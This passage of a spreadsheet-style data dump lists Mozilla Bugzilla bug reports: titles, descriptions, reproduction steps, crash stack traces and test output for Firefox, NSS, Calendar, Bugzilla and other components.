can't read /mnt/mozilla/comm-central/mozilla/modules/plugin/tools/sdk/samples/winless/windows/Makefile.in: No such file or directory</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-281881</t>
  </si>
  <si>
    <t>Bugzilla Helper suggests I use Bugzilla Helper</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Except for the bugzilla product it seems that the bugzilla helper in its
second paragraph says Consider using the Bugzilla Helper instead of this form
Of course the link is to the same url you're on.  
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CORE-253688</t>
  </si>
  <si>
    <t>memory leak in Mozilla when adding a eventListener from JavaScript and not removing it</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de-AT rv:1.7) Gecko/20040616
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de-AT rv:1.7) Gecko/20040616
When you add a eventListener to a DomNode and remember a object reference to the
DomNode the object is not removed when the Site is reloaded. See the URL with
the reproducer...
Reproducible: Always
Steps to Reproduce:
1. Open the URL
2. press on reload with enabled memory leak
3. reload once and see the process table/memory using
Actual Results:  
The Memory for bigObject is not freed after reload
Expected Results:  
bigObject should be freed after reload</t>
  </si>
  <si>
    <t>feurle</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-258652</t>
  </si>
  <si>
    <t>JavaScript console: Pinstripe warning icon is wrong</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O rv:1.7.3) Gecko/20040909 Firefox/0.10
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O rv:1.7.3) Gecko/20040909 Firefox/0.10
In the JS console the icon displayed for warnings is the generic firefox icon
not a warning icon. It is also a different size than the error icon causing
the console to look ugly.
Reproducible: Always
Steps to Reproduce:
1. Go to a site producing JS warning (such as http://haaretz.co.il )
2. Open JavaScript console
3. Observe</t>
  </si>
  <si>
    <t>CORE-470703</t>
  </si>
  <si>
    <t>-moz-box-ordinal-group should not allow negative values</t>
  </si>
  <si>
    <t>Created attachment 354087
patch
-moz-box-ordinal-group currently stores its value as an unsigned integer and handles it as such.  However we accept negative integers when parsing the property which I think we should not do.  (Doing so causes us to fail a bunch of serialization tests because we reserialize -1 as something in scientific notation.)
This changes the parsing code to reject negative values.</t>
  </si>
  <si>
    <t>CORE-349527</t>
  </si>
  <si>
    <t>GC hazard when copying JSErrorReport</t>
  </si>
  <si>
    <t>exn_newPrivate from js/src/jsexn.c contains the following code:
    /*
     * We don't need to copy linebuf and tokenptr because they
     * point into the deflated string cache.  (currently?)
     */
    newReport-&gt;linebuf = report-&gt;linebuf  
    newReport-&gt;tokenptr = report-&gt;tokenptr
This is wrong since for example any finally block can trigger GC before the error is reported. GC then releases the cache leading later to accessing of freed memory in the error handler.
For example consider the following example for JS shell:
var invalid_script = Array(1&lt;&lt;12).join('\n')+bad!bad!bad
try {
        Function(invalid_script)
} finally {  
        try {
                Function(invalid_script)
        } catch (e) {
        }
        gc()
}
When the line gc() is commented out the shell prints:
~/m/trunk/mozilla/js/src&gt; ./Linux_All_DBG.OBJ/js ~/s/x.js
/home/igor/s/x.js:4099: SyntaxError: missing  before statement:
/home/igor/s/x.js:4099: bad!bad!bad
/home/igor/s/x.js:4099: ...^
With gc() call present the result is:
~/m/trunk/mozilla/js/src&gt; ./Linux_All_DBG.OBJ/js ~/s/x.js
before 9232 after 9232 break 0819c000
/home/igor/s/x.js:4099: SyntaxError: missing  before statement:
/home/igor/s/x.js:4099:
/home/igor/s/x.js:4099: ...^
I.e. the shell is accessing freed memory when it prints the error report.</t>
  </si>
  <si>
    <t>CORE-977577</t>
  </si>
  <si>
    <t>IonMonkey: Recompilecheck shouldn't always do vmcall</t>
  </si>
  <si>
    <t>In order to make MRecompileCheck a bit more useable check if the script is already being scheduled for recompiling before doing the oolvmcall. Else this will decrease our speed when still running the script and a new version is still being compiled.</t>
  </si>
  <si>
    <t>hv1989</t>
  </si>
  <si>
    <t>BUGZILLA-425565</t>
  </si>
  <si>
    <t>Product name not displayed in the error message when adding/removing bugs to/from illegal groups</t>
  </si>
  <si>
    <t>Created attachment 312160
patch v1
Minor error due to bug 401965. We pass the product name to user-error not the product object.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-518312</t>
  </si>
  <si>
    <t>moz2-win32-slave03 is in an unusable state</t>
  </si>
  <si>
    <t>I'm not sure what's going on with it but I can't do anything including: viewing the console turning it off / shutting it down reverting to a snapshot. It's got a funny icon beside it in the list in the VI client though I don't know what it means.</t>
  </si>
  <si>
    <t>NSS-58624</t>
  </si>
  <si>
    <t>SSL Stress Test fails on FreeBSD 3.5</t>
  </si>
  <si>
    <t>The NSS 3.1 SSL Stress Tests fail for me on FreeBSD 3.5.  The end of the output
of './ssl.sh stress' looks like this:
********************* Stress Test  ****************************
********************* Stress SSL2 RC4 128 with MD5 ****************************
selfserv -p 8443 -d
/local/llennox/NSS-PSM/mozilla/tests_results/security/conrail.20/server -n
conrail.cs.columbia.edu -w nss   -i /tmp/tests_pid.5505  &amp;
strsclnt -p 8443 -d . -w nss -c 1000 -C A  conrail.cs.columbia.edu 
strsclnt: -- SSL: Server Certificate Validated.
strsclnt: PR_NewTCPSocket returned error -5974:
Insufficient system resources.
Terminated 
********************* Stress SSL3 RC4 128 with MD5 ****************************
selfserv -p 8443 -d
/local/llennox/NSS-PSM/mozilla/tests_results/security/conrail.20/server -n
conrail.cs.columbia.edu -w nss   -i /tmp/tests_pid.5505  &amp;
strsclnt -p 8443 -d . -w nss -c 1000 -C c  conrail.cs.columbia.edu 
strsclnt: -- SSL: Server Certificate Validated.
strsclnt: PR_NewTCPSocket returned error -5974:
Insufficient system resources.
Terminated 
Running ktrace on the process (ktrace is a system-call tracer the equivalent of
Linux's strace) reveals that socket() failed with ENOBUFS after it was called
for the 953rd time for the first test and it failed after the 27th time it was
called for the second test.
The failure is consistent both for debug and optimized builds I haven't tested
to see whether the count of socket() failures is consistent.
All the other NSS tests pass successfully.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-301264</t>
  </si>
  <si>
    <t>Crash [@ nsMsgCompose::SetDocumentCharset]</t>
  </si>
  <si>
    <t>Incident ID: 7426469
Stack Signature	nsMsgCompose::SetDocumentCharset 15071b7e
Product ID	MozillaTrunk
Build ID	2005070805
Trigger Time	2005-07-12 15:16:10.0
Platform	Win32
Operating System	Windows 95 4.0 build 67306684
Module	MSGCOMPO.DLL + (0000851b)
URL visited	http://adblock.mozdev.org/forum.html/no_wrap
User Comments	
Since Last Crash	20573 sec
Total Uptime	168700 sec
Trigger Reason	Access violation
Source File Line No.
c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/mailnews/compose/src/nsMsgCompose.cpp
line 737
Stack Trace 	
nsMsgCompose::SetDocumentCharset 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/mailnews/compose/src/nsMsgCompose.cpp
line 737]
XPTC_InvokeByIndex 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp
line 102]
XPCWrappedNative::CallMethod 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/xpconnect/src/xpcwrappednative.cpp
line 2119]
XPC_WN_CallMethod 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp
line 1348]
js_Invoke 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 1173]
js_Interpret 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 3464]
js_Invoke 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 1193]
js_InternalInvoke 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsinterp.c
line 1270]
JS_CallFunctionValue 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/js/src/jsapi.c line
3920]
nsJSContext::CallEventHandler 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/dom/src/base/nsJSEnvironment.cpp
line 1400]
nsJSEventListener::HandleEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/dom/src/events/nsJSEventListener.cpp
line 184]
nsEventListenerManager::HandleEventSubType 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/events/src/nsEventListenerManager.cpp
line 1580]
nsEventListenerManager::HandleEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/events/src/nsEventListenerManager.cpp
line 1681]
nsXULElement::HandleDOMEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/xul/content/src/nsXULElement.cpp
line 2201]
nsXULElement::HandleDOMEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/content/xul/content/src/nsXULElement.cpp
line 2222]
PresShell::HandleDOMEventWithTarget 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/base/nsPresShell.cpp
line 6448]
nsMenuFrame::OnCreate 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/xul/base/src/nsMenuFrame.cpp
line 1668]
nsMenuFrame::OpenMenuInternal 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/xul/base/src/nsMenuFrame.cpp
line 743]
nsMenuFrame::OpenMenu 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/xul/base/src/nsMenuFrame.cpp
line 730]
nsMenuFrame::HandleEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/xul/base/src/nsMenuFrame.cpp
line 426]
PresShell::HandleEventInternal 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/base/nsPresShell.cpp
line 6413]
PresShell::HandleEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/layout/base/nsPresShell.cpp
line 6193]
nsViewManager::HandleEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/view/src/nsViewManager.cpp
line 2502]
nsViewManager::DispatchEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/view/src/nsViewManager.cpp
line 2224]
HandleEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/view/src/nsView.cpp
line 174]
nsWindow::DispatchEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
line 1171]
nsWindow::DispatchMouseEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
line 5794]
ChildWindow::DispatchMouseEvent 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
line 6040]
nsWindow::WindowProc 
[c:/builds/tinderbox/MozillaTrunk/WINNT_5.0_Clobber/mozilla/widget/src/windows/nsWindow.cpp
line 1348]
KERNEL32.DLL + 0x35d9 (0xbff735d9)
KERNEL32.DLL + 0x2222f (0xbff9222f)
0x00638bec</t>
  </si>
  <si>
    <t>FIREFOX-865644</t>
  </si>
  <si>
    <t>PDF Viewer</t>
  </si>
  <si>
    <t>Variable-height math (TeX) symbols incorrectly scaled</t>
  </si>
  <si>
    <t>In this document
  http://www.ams.org/notices/201208/rtx120801094p.pdf
variable-height math symbols are exceedingly scaled in the y direction. See the brackets square root symbols sum (sigma) symbols and integral (old s) symbols.</t>
  </si>
  <si>
    <t>CORE-370769</t>
  </si>
  <si>
    <t>All popups overflow</t>
  </si>
  <si>
    <t>See https://bugzilla.mozilla.org/show_bug.cgi?id=369584#c3 that's now on trunk as a result of bug 370659.</t>
  </si>
  <si>
    <t>CALENDAR-512780</t>
  </si>
  <si>
    <t>Import and Export</t>
  </si>
  <si>
    <t>Console error during calendar export [Error: File Read Error (underflow.)]</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 6.1 en-US rv:1.9.1.4pre) Gecko/20090826 Calendar/1.0pre
Steps To Reproduce:
===================
1. Create new Sunbird profile and start the application
2. Create some events in the default calendar
3. Export the entire calendar
Actual Results:
===============
Error Console shows the following message twice:
  Error: File Read Error (underflow.) (file:///D:/dev/sunbird/calendar-js/)
  Source File: file:///D:/dev/sunbird/modules/calUtils.jsm Line: 80
But the Save As dialog is displayed and the export seems to finish successful.
Extended log from debug console:
[calAlarmService] starting...
... loading script='calIcsImportExport.js' ...
... loading script='undefined' ...
1: [file:///D:/obj/mozilla/dist/bin/modules/calUtils.jsm:79] cal_loadScripts
2: [file:///D:/obj/mozilla/dist/bin/components/calImportExportModule.js:118] anonymous
3: [file:///D:/obj/mozilla/dist/bin/components/calImportExportModule.js:175] anonymous
4: [null:0] null
5: [chrome://calendar/content/import-export.js:264] saveEventsToFile
6: [chrome://calendar/content/import-export.js:330] anonymous
7: [null:0] null
8: [file:///D:/obj/mozilla/dist/bin/modules/calProviderUtils.jsm:567] cPB_notifyOperationComplete
9: [file:///D:/obj/mozilla/dist/bin/calendar-js/calStorageCalendar.js:898] cSC_getItems_
10: [file:///D:/obj/mozilla/dist/bin/calendar-js/calStorageCalendar.js:666] anonymous
... loading script='calHtmlExport.js' ...
... loading script='calListFormatter.js' ...
... loading script='calMonthGridPrinter.js' ...
... loading script='calWeekPrinter.js' ...
... loading script='calOutlookCSVImportExport.js' ...
... loading script='undefined' ...
1: [file:///D:/obj/mozilla/dist/bin/modules/calUtils.jsm:79] cal_loadScripts
2: [file:///D:/obj/mozilla/dist/bin/components/calImportExportModule.js:118] anonymous
3: [file:///D:/obj/mozilla/dist/bin/components/calImportExportModule.js:175] anonymous
4: [null:0] null
5: [chrome://calendar/content/import-export.js:264] saveEventsToFile
6: [chrome://calendar/content/import-export.js:330] anonymous
7: [null:0] null
8: [file:///D:/obj/mozilla/dist/bin/modules/calProviderUtils.jsm:567] cPB_notifyOperationComplete
9: [file:///D:/obj/mozilla/dist/bin/calendar-js/calStorageCalendar.js:898] cSC_getItems_
10: [file:///D:/obj/mozilla/dist/bin/calendar-js/calStorageCalendar.js:666] anonymous
... loading script='calUtils.js' ...</t>
  </si>
  <si>
    <t>CALENDAR-372868</t>
  </si>
  <si>
    <t>Schema out-of-date error check forces Tb to quit so you can't disable Ln</t>
  </si>
  <si>
    <t>Spin-off from bug 369819
Currently the schema out-of-date error check will quit the running app rather than allow you to possibly munge your data.
This is fine for Sunbird but for Lightning it has the unhelpful side effect of preventing you from getting to the Add-ons Manager to disable the offending version of Lightning.
For Lightning instead of forcing Tb to quit we should just disable Ln.</t>
  </si>
  <si>
    <t>CORE-315786</t>
  </si>
  <si>
    <t>Make the functions defined in nsEscape.h more useful</t>
  </si>
  <si>
    <t>Make the functions defined in nsEscape.h more useful
For example it is a pain to escape/unescape UTF-16 strings.  NS_EscapeURL and NS_UnescapeURL all have versions that return nsACString references that helps avoid copying when unnecessary.  However many consumers would be happier with a nsCSubstring reference or a nsCString reference.  We can easily support other inline variants on those methods that makes the APIs easier to use.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-436705</t>
  </si>
  <si>
    <t>English access key in search bar context menu</t>
  </si>
  <si>
    <t>in FF3rc1 right click on the search bar. the last option Show Recommendations (or however it is in English i have the hebrew version) has S as the access key instead of a hebrew access key.</t>
  </si>
  <si>
    <t>DIRECTORY-368747</t>
  </si>
  <si>
    <t>Relicense perldap under the MPL/LGPL/GPL tri-license</t>
  </si>
  <si>
    <t>The perldap code is currently licensed under the MPL only.  We should use the same triple licensing that other Mozilla components use.</t>
  </si>
  <si>
    <t>TOOLKIT-247156</t>
  </si>
  <si>
    <t>support non-jarred extensions</t>
  </si>
  <si>
    <t xml:space="preserve">The new extension manager requires compliant extensions to jar their package
locale and theme files.  It should allow extensions to leave those files
unjarred i.e. something like:
        content/
        locale/en-US/
        skin/classic/
    </t>
  </si>
  <si>
    <t>CORE-928044</t>
  </si>
  <si>
    <t>Enable an open sandbox by default on Windows (when e10s enabled)</t>
  </si>
  <si>
    <t>Bug 928042 adds preference to enable content sandboxing. This bug is to enable that pref by default.</t>
  </si>
  <si>
    <t>bobowencode</t>
  </si>
  <si>
    <t>netzen</t>
  </si>
  <si>
    <t>CORE-76209</t>
  </si>
  <si>
    <t>Style context caches removes elements from the middle of an array</t>
  </si>
  <si>
    <t>Another fallout of profiling the colour table stress case (the style people must 
begin to hate me. :-) ) is that there is a nsVoidArray that is emptied one 
element at a time which causes alot of memmoves which degrades performance when 
pulling down a big style system.
If I understand it correctly StyleContextImpl's destructor 
calls StyleSetImpl::RemoveStyleContext which removes the style from a cache with 
the following code.
  nsVoidArray *pResults = nsnull
  if (NS_SUCCEEDED(GetContexts(aKey&amp;pResults)) &amp;&amp; pResults) {
     PRUint32 nCountBefore = Count()
     if (nCountBefore &gt; 0){
       if(pResults-&gt;RemoveElement(aContext)) {
...
RemoveElement is slow since it requires moving at average half the array in 
memory. When done with all elements we get a nice O(n^2) algorithm.
According to quantify (which I don't trust very much anymore btw) it is 
0.5 seconds when leaving the colour table stress case.</t>
  </si>
  <si>
    <t>FIREFOX-464942</t>
  </si>
  <si>
    <t>|failed in test_removeDataFromDomain.js on (NS_ERROR_FILE_NOT_FOUND) [nsICacheService.evictEntries] nsPrivateBrowsingService.js :: PBS_removeDataFromDomain :: line 296|</t>
  </si>
  <si>
    <t>moz2-darwin8-slave01 turned orange this morning with TEST-UNEXPECTED-FAIL on /test_privatebrowsing/unit/test_removeDataFromDomain.js because of the following error:
(NS_ERROR_FILE_NOT_FOUND) [nsICacheService.evictEntries] location: nsPrivateBrowsingService.js :: PBS_removeDataFromDomain :: line 296
It turned green the next cycle so it's not yet clear whether this was a one off or is an intermittent problem.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-202339</t>
  </si>
  <si>
    <t>Crash displaying mail messages [@ nsGenericHTMLElement::FindAttributeImpact]</t>
  </si>
  <si>
    <t>I just pulled a tree picking up the static atom changes in mozilla\html\content
(after the most recent changes late this afternoon). 
I'm crashing when trying to view various messages in:
nsGenericHTMLElement::FindAttributeImpact
if (aAttribute == *map-&gt;attribute) {
looks like the value of map is pointing to invalid memory. 
Alec do you think this is related to the static atom changes in content\html or
is it something else?</t>
  </si>
  <si>
    <t>CORE-343156</t>
  </si>
  <si>
    <t>New ATK: expose new action for images to open long description (longdesc) in a new tab</t>
  </si>
  <si>
    <t>Rather than just exposing the URL or asynchronously trying to load the URL and exposing that via description it's better just to open longdesc's in a new window and let the user browse the info. It could contain tables and forms etc.
We should expose a new action on images which does this.</t>
  </si>
  <si>
    <t>NSS-198159</t>
  </si>
  <si>
    <t>Backport performance enhancements to NSS 3.3 branch</t>
  </si>
  <si>
    <t>Michael Hein has tasked me with backporting the fix for
the following bug on NSS_3_3_BRANCH.
121523 PKCS Lock Contention (sessionLock and scalability)
http://bugzilla.mozilla.org/show_bug.cgi?id=121523
The SunOne webserver team want this for performance gain.
Since NSS 3.3 selfser195981v is pre -L [seconds] the statistics
logging capability the combined patch will integrate these too:
107777 selfserv needs log stats mode
http://bugzilla.mozilla.org/show_bug.cgi?id=107777
195981 selfserv usage lacks -L
http://bugzilla.mozilla.org/show_bug.cgi?id=195981</t>
  </si>
  <si>
    <t>BUGZILLA-283582</t>
  </si>
  <si>
    <t>Remove UserInGroup in favor of Bugzilla-&gt;user-&gt;in_group</t>
  </si>
  <si>
    <t>The title says it all. Right now we have three ways of checking if a user is in
a group:
1) Bugzilla-&gt;user-&gt;groups
2) Bugzilla-&gt;user-&gt;in_group
3) UserInGroup
For clarity and simplcity I think that #2 should be used in all the places
where we're actually checking if a user has a certain permission and
UserInGroup should go away and Bugzilla-&gt;user-&gt;groups should no longer be
directly used for that purpose.
While this happens I also think that the implementation of in_group should
change to always call -&gt;groups because we're almost always calling it multiple
times on Bugzilla-&gt;user in the same page anyway one medium-size SQL call is
almost always better than three or four small ones.</t>
  </si>
  <si>
    <t>NSS-160424</t>
  </si>
  <si>
    <t>NSS crashes when some smartcards return invalid or corrupt certificates</t>
  </si>
  <si>
    <t>This is somewhat related to bug #157730 but affects all platforms.
The problem is apparent when using MUSCLE drivers for instances where the CAC
card has 2 (instead of 3) certificates stored on it.  The driver is trying to
report back the 3rd cert on the card when NSS queries the driver for certs on
the token.
We need a way to filter out corrupt structures when PKCS#11 drivers report back
apparently invalid certificates.</t>
  </si>
  <si>
    <t>Bill.Burns</t>
  </si>
  <si>
    <t>CORE-124412</t>
  </si>
  <si>
    <t>Make nsXULDocument inherit from nsDocument</t>
  </si>
  <si>
    <t>Some time ago it was said that nsXULDocument should inherit from nsDocument for
various reasons:
- less code duplication
- unimplemented XUL methods are implemented for free
- clean up nsCOMPtr vs raw pointer issues in nsDocument
I'm filing this bug now so I have a bug to mark all the others dependent on.
Unless a patch is contributed this is probably post-1.0 work as the fix is very
highrisk (leaks and other regressions) but at least we have a bug about it...</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-181850</t>
  </si>
  <si>
    <t>Downloaded FTP file not shown in visited color if the file was not displayed</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3a) Gecko/20021123
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3a) Gecko/20021123
FTP links such as the ones under the Nightly Builds section of Mozilla's home
page are not shown as visited after being activated.
Reproducible: Always
Steps to Reproduce:
1. Go to http://mozilla.org/
2. Click on a FTP link to one of the nightlies
3. See that the link does not shown as visited you may even try reloading
Actual Results:  
The link that had been activated was still displayed as non-visited.
Expected Results:  
It should show the link as visited so that I knew I had already downloaded
that file. If the resource changed (e.g. a new nightly was uploaded) it would
be nice to have the link redisplayed as non-visited. The expected behavior is
the same as for HTTP links.</t>
  </si>
  <si>
    <t>zunino</t>
  </si>
  <si>
    <t>FIREFOX-342182</t>
  </si>
  <si>
    <t>text field on new bookmarks folder is too short</t>
  </si>
  <si>
    <t>text field on new bookmarks folder is too short.  this is a regression but I'm not sure how recently.
Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.8.1a3) Gecko/20060620 BonEcho/2.0a3
screen shot coming.</t>
  </si>
  <si>
    <t>WEBSITES-509764</t>
  </si>
  <si>
    <t>add stephen horlander to planet.mozilla.org</t>
  </si>
  <si>
    <t>I hope this is the right place :)
I was hoping I could please get my blog added to the Planet feed.
The feed URL is http://blog.stephenhorlander.com/category/firefox/feed/
Thank you!
Stephen Horlander - Firefox Visual Designer</t>
  </si>
  <si>
    <t>CORE-24199</t>
  </si>
  <si>
    <t>[BiDi] Arabic Pages are rendered left-to-right!</t>
  </si>
  <si>
    <t>Hi
I must first say congrats. IE was and still is the only browser that can show
you any page in any language.
So this is a big step forward. I am able to see arabic letters on the page but
not in the right order and not ligatured (is this the word?).
This is not a bug per se but an important issue.
Mozilla should render a page written in any language (as in speaking languages).
I really wanna ditch IE!</t>
  </si>
  <si>
    <t>aurag</t>
  </si>
  <si>
    <t>TOOLKIT-227142</t>
  </si>
  <si>
    <t>'cancel' hidden if filename too big</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6b) Gecko/20031128 Firebird/0.7+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6b) Gecko/20031128 Firebird/0.7+
When a file with a particularly long filename is enters the download manage
window it is not possible to Cancel the transfer without scrolling.
I shall attach a screenshot.
Reproducible: Always
Steps to Reproduce:
1. Find a file with a long filename.
2. Download.
3. Look at download manage.
Actual Results:  
Cancel is out of view.
Expected Results:  
'Cancel' should be placed next to 'Pause' so that is always available.</t>
  </si>
  <si>
    <t>jacksmall</t>
  </si>
  <si>
    <t>TOOLKIT-289422</t>
  </si>
  <si>
    <t>Erroneous javascript Focus() function will break close of findbar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050407 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050407 Firefox/1.0+
When implementing an errorneous focus javascript function will result in an
unclosable findbar. Green update icon is displayed (not hidden on start) when
testcase HTML file is direcly opened from local computer in a new firefox.
Reproducible: Always
Steps to Reproduce:
1. Open testcase
2. Open find toolbar (ctrl-F)
3. Try closing find toolbar
Actual Results:  
Find toolbar isn't closing the error from the focus function is reported in
Javascript console. On direct html-file open the firefox update icon is displayed.
Expected Results:  
Find toolbar should close and mention the error in focus() in Javascript console.
No update icon when opening the testcase directly from local computer.</t>
  </si>
  <si>
    <t>g.teunis</t>
  </si>
  <si>
    <t>CORE-94492</t>
  </si>
  <si>
    <t>usage of relative path for XBL broken</t>
  </si>
  <si>
    <t>Whereas the attached application works in Moz 0.91  it fails to load the XBL 
in 0.92 and 0.93</t>
  </si>
  <si>
    <t>wgrinfeld</t>
  </si>
  <si>
    <t>CORE-55950</t>
  </si>
  <si>
    <t>disk cache flushed upon startup</t>
  </si>
  <si>
    <t>Using the M18 candidate code (2000100907) each time I start up Mozilla the disk 
cache gets flushed. This is not expected behaviour!
Note that this is an OpenVMS specific bug (at least I can't reproduce it on 
Linux).</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-806096</t>
  </si>
  <si>
    <t>GonkIntegration</t>
  </si>
  <si>
    <t>Pandaboard builds with new kernel don't always boot</t>
  </si>
  <si>
    <t>So the new kernel that Thomas created is not working on all panda boards.  We cannot seem to determine why. We have exact same board revisions same connectors connected in the same order and when we put an sdcard flashed with this kernel into one board it boots and in another board it doesn't.  Out of 4 identical boards 2 booted and 2 didn't.  The boards that don't boot get to the booting kernel line in the serial console and then hang indefinitely.  Here is the output from one such failed attempt:
Texas Instruments X-Loader 1.41 (Oct 21 2011 - 09:28:33)
OMAP4460: 1.2 GHz capable SOM
Starting OS Bootloader from MMC/SD1 ...
U-Boot 1.1.4-gedeced79 (Feb  6 2012 - 09:27:11)
Load address: 0x80e80000
DRAM:  1024 MB
Flash:  0 kB
Using default environment
In:    serial
Out:   serial
Err:   serial
efi partition table:
     256     128K xloader
     512     256K bootloader
    2048       8M recovery
   18432       8M boot
   34816     512M system
 1083392     256M cache
 1607680   14408M userdata
Net:   KS8851SNL
Hit any key to stop autoboot:  0 
kernel   @ 80008000 (3786640)
ramdisk  @ 81000000 (164989)
I2C read: I/O error
Starting kernel ...
Uncompressing Linux... done booting the kernel.
And it just hangs there ^ forever.  When the build does work it shows the same output stops on the booting the kernel line for about one second and then starts booting the kernel and outputting information. Malini and I bisected the commits in https://github.com/mozilla-b2g/android-device-panda/commits/master and we found that the first build that has a problem is the first commit with the new kernel - commit: 2042c6165da208f88b16d77cd5fd36d3d14938ec
If we flash an sdcard with the old kernel (before this commit) then we can put that sdcard into any panda and that panda will boot. However with the new kernel about 50% of the pandas we try with the new kernel will not boot.
When the kernel does not boot on a panda it is very reproducible. So I have a board here that exhibits this behavior and I can mail it to you if you want to take a look at it.</t>
  </si>
  <si>
    <t>tdz</t>
  </si>
  <si>
    <t>FIREFOX-420239</t>
  </si>
  <si>
    <t>Closing Gmail causes the browser to hang</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9b3) Gecko/2008020513 Firefox/3.0b3
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9b3) Gecko/2008020513 Firefox/3.0b3
One of the things I like best about Firefox 3 is it's fast Javascript parsing. Gmail is so much faster now!
However when I close Gmail the whole browser becomes unresponsive especially if I have other sites open that use Javascript or Flash.
Reproducible: Always
Steps to Reproduce:
1. Log in to Gmail.
2. Open another tab with heavy client side scripting such as http://www.gamedesign.jp/flash/dice/dice.html
3. Close the Gmail tab.
Actual Results:  
The browser becomes unresponsive.
Expected Results:  
The browser should remain snappy. Closing a Javascript heavy page should immediately purge the Javascript from memory. Keep it in cache if that's what the user prefers but stop parsing.</t>
  </si>
  <si>
    <t>smenjas</t>
  </si>
  <si>
    <t>CALENDAR-392737</t>
  </si>
  <si>
    <t>Event dialog: No 'save and close' function in the new event file menu</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Build Identifier: Thunderbird v2.0.0.6 (20070728) / Lightning v0.7pre (2007081804)
In the 'new event' dialog it is not possible to choose the 'save and close' function via the menu bar/file menu although a 'save and close' button exists in toolbar.
Reproducible: Always
Steps to Reproduce:
1. create a new event
2. open the file menu from the menu bar to save and close the newly created event.
3. 
Actual Results:  
the desired function doesn't exist in the file menu.
Expected Results:  
It should also be possible to choose 'save and close' via the file menu.</t>
  </si>
  <si>
    <t>juergen.edner</t>
  </si>
  <si>
    <t>NSS-201081</t>
  </si>
  <si>
    <t>session id's are not hashed effectively</t>
  </si>
  <si>
    <t>Session id's are created by a monotonically increasing counter.  They are hashed
by a mod operation using the size of the session table as a base (between 1024
